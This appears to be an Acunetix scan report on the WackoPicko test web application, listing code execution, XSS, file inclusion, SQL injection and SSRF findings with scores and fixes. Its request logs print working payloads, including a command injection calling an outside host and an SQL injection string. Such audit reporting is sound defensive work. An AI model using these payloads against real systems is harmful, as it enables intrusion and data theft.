Professional Documents
Culture Documents
Report
Acunetix Security Audit
09 June 2020
Generated by Acunetix
Selected vulnerabilities
Scan details
Scan information
Start url http://192.168.1.124/WackoPicko/
Host http://192.168.1.124/
Threat level
One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.
Alerts distribution
Code execution
Classification
Base Score: 6.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 9.1
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: None
CWE CWE-94
Affected items Variation
/WackoPicko/passcheck.php 1
Classification
Base Score: 6.4
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None
CWE CWE-79
Affected items Variation
/WackoPicko/guestbook.php 1
/WackoPicko/pictures/search.php 1
/WackoPicko/users/login.php 1
File inclusion
Classification
Base Score: 7.5
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-20
Affected items Variation
/WackoPicko/admin/index.php 2
Classification
Base Score: 6.4
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None
CWE CWE-79
Affected items Variation
/WackoPicko/admin/index.php 2
SQL injection
Classification
Base Score: 6.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 10.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Changed
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: None
CWE CWE-89
Affected items Variation
/WackoPicko/users/login.php 1
Classification
Base Score: 5.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 9.0
Attack Vector: Network
Attack Complexity: High
Privileges Required: None
CVSS3 User Interaction: None
Scope: Changed
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: High
CWE CWE-918
Affected items Variation
/WackoPicko/admin/index.php 2
Alerts details
Code execution
Severity High
Reported by module /Scripts/PerScheme/Code_Execution.script
Description
Code injection vulnerabilities occur where the output or content served from a Web application can be manipulated in such
a way that it triggers server-side code execution. In some poorly written Web applications that allow users to modify server-
side files (such as by posting to a message board or guestbook) it is sometimes possible to inject code in the scripting
language of the application itself.
Impact
A malicious user may execute arbitrary system commands with the permissions of the web server.
Recommendation
References
Affected items
/WackoPicko/passcheck.php
Details
URL encoded POST input password was set to $(nslookup hitcHBX8q1QN7f0d6f.bxss.me)
Request headers
POST /WackoPicko/passcheck.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 51
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
password=%24(nslookup%20hitcHBX8q1QN7f0d6f.bxss.me)
Severity High
Reported by module /Scripts/PerScheme/XSS.script
Description
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into
a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user
input within the output it generates.
Impact
Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local
storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then
impersonate that user.
Furthermore, JavaScript can read and make arbitrary modifications to the contents of a page being displayed to a user.
Therefore, XSS in conjunction with some clever social engineering opens up a lot of possibilities for an attacker.
Recommendation
References
Affected items
/WackoPicko/guestbook.php
Verified vulnerability
Details
URL encoded POST input comment was set to 555'"()&%<acx><ScRiPt >EVua(9983)</ScRiPt>
Request headers
POST /WackoPicko/guestbook.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 70
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
comment=555'"()%26%25<acx><ScRiPt%20>EVua(9983)</ScRiPt>&name=UHOdllxh
/WackoPicko/pictures/search.php
Verified vulnerability
Details
URL encoded GET input query was set to 1'"()&%<acx><ScRiPt >wU91(9983)</ScRiPt>
Request headers
GET /WackoPicko/pictures/search.php?query=1'"()%26%25<acx><ScRiPt%20>wU91(9983)</ScRiPt>
HTTP/1.1
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
/WackoPicko/users/login.php
Verified vulnerability
Details
URL encoded POST input username was set to UHOdllxh'"()&%<acx><ScRiPt >XCbr(9711)</ScRiPt>
Request headers
POST /WackoPicko/users/login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 88
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
password=g00dPa%24%24w0rD&username=UHOdllxh'"()%26%25<acx><ScRiPt%20>XCbr(9711)</ScRiPt>
File inclusion
Severity High
Reported by module /Scripts/PerScheme/File_Inclusion.script
Description
It seems that this script includes a file which name is determined using user-supplied data. This data is not properly
validated before being passed to the include function.
Impact
It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with
the privileges of the web-server.
Recommendation
Edit the source code to ensure that input is properly validated. Where is possible, it is recommended to make a list of
accepted filenames and restrict the input to that list.
For PHP, the option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file
using a URL rather than a local file path. It is recommended to disable this option from php.ini.
References
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to http://bxss.me/t/fit.txt%3F.jpg
Pattern found:
63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8
Request headers
POST /WackoPicko/admin/index.php?page=http://bxss.me/t/fit.txt%3F.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 41
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
adminname=g00dPa%24%24w0rD&password=login
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to http://bxss.me/t/fit.txt%3F.jpg
Pattern found:
63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8
Request headers
GET /WackoPicko/admin/index.php?page=http://bxss.me/t/fit.txt%3F.jpg HTTP/1.1
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Severity High
Reported by module /Scripts/PerScheme/Remote_File_Inclusion_XSS.script
Description
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the
form of Javascript) to another user. The server opens arbitrary URLs and puts the content retrieved from the URL into the
response without filtering.
Impact
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in
order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the
user. It is also possible to modify the content of the page presented to the user.
Recommendation
Your server side code should verify if the URL from the user input is allowed to be retrieved and displayed or filter the
response from the URL according to the context in which it is displayed.
References
Affected items
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to HttP://bxss.me/t/xss.html?%00
Request headers
POST /WackoPicko/admin/index.php?page=HttP://bxss.me/t/xss.html%3F%2500 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 41
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
adminname=g00dPa%24%24w0rD&password=login
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to HttP://bxss.me/t/xss.html?%00
Request headers
GET /WackoPicko/admin/index.php?page=HttP://bxss.me/t/xss.html%3F%2500 HTTP/1.1
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
SQL injection
Severity High
Reported by module /Scripts/PerScheme/Sql_Injection.script
Description
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a
web application's database server.
Impact
An attacker can use SQL injection it to bypass a web application's authentication and authorization mechanisms and
retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database,
affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands,
which may then be used to escalate an attack even further.
Recommendation
Use parameterized queries when dealing with SQL queries that contains user input. Parameterized queries allows the
database to understand which parts of the SQL query should be considered as user input, therefore solving SQL injection.
References
Affected items
/WackoPicko/users/login.php
Verified vulnerability
Details
URL encoded POST input username was set to 'and(select 1 from(select count(*),concat((select
concat(CHAR(52),CHAR(67),CHAR(117),CHAR(81),CHAR(57),CHAR(67),CHAR(121),CHAR(52),CHAR(79),CHAR(5
0),CHAR(69)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group
by x)a)and'
4CuQ9Cy4O2E
Request headers
POST /WackoPicko/users/login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 355
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
password=g00dPa%24%24w0rD&username='and(select%201%20from(select%20count(*)%2Cconcat((sel
ect%20concat(CHAR(52)%2CCHAR(67)%2CCHAR(117)%2CCHAR(81)%2CCHAR(57)%2CCHAR(67)%2CCHAR(121)
%2CCHAR(52)%2CCHAR(79)%2CCHAR(50)%2CCHAR(69))%20from%20information_schema.tables%20limit%
200%2C1)%2Cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'
Severity High
Reported by module /Scripts/PerScheme/Server_Side_Request_Forgery.script
Description
SSRF as in Server Side Request Forgery is a vulnerability that allows an attacker to force server interfaces into sending
packets initiated by the victim server to the local interface or to another server behind the firewall. Consult Web References
for more information about this problem.
Impact
Recommendation
References
Affected items
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to http://hitm1YRhASIND.bxss.me/
An HTTP request was initiated for the domain hitm1YRhASIND.bxss.me which indicates that this script is vulnerable to
SSRF.
IP address: 179.8.237.20
User agent:
Request headers
POST /WackoPicko/admin/index.php?page=http://hitm1YRhASIND.bxss.me/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 41
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
adminname=g00dPa%24%24w0rD&password=login
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to http://hitYWkgofMX4F.bxss.me/
An HTTP request was initiated for the domain hitYWkgofMX4F.bxss.me which indicates that this script is vulnerable to
SSRF.
IP address: 179.8.237.20
User agent:
Request headers
GET /WackoPicko/admin/index.php?page=http://hitYWkgofMX4F.bxss.me/ HTTP/1.1
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/73.0.3683.103 Safari/537.36
Scanned items (coverage report)
http://192.168.1.124/WackoPicko/admin/index.php
http://192.168.1.124/WackoPicko/guestbook.php
http://192.168.1.124/WackoPicko/passcheck.php
http://192.168.1.124/WackoPicko/pictures/search.php
http://192.168.1.124/WackoPicko/users/login.php